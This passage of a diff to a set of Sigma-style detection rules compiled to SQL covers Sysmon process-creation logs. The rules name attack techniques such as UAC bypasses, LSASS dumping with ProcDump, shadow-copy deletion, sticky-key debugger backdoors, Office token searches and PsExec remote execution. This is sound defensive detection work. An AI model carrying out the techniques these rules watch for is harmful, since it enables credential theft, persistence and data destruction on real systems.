'%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.t1546.008" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.004" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ - "attack.t1218", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Legitimate commands in .lnk files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' 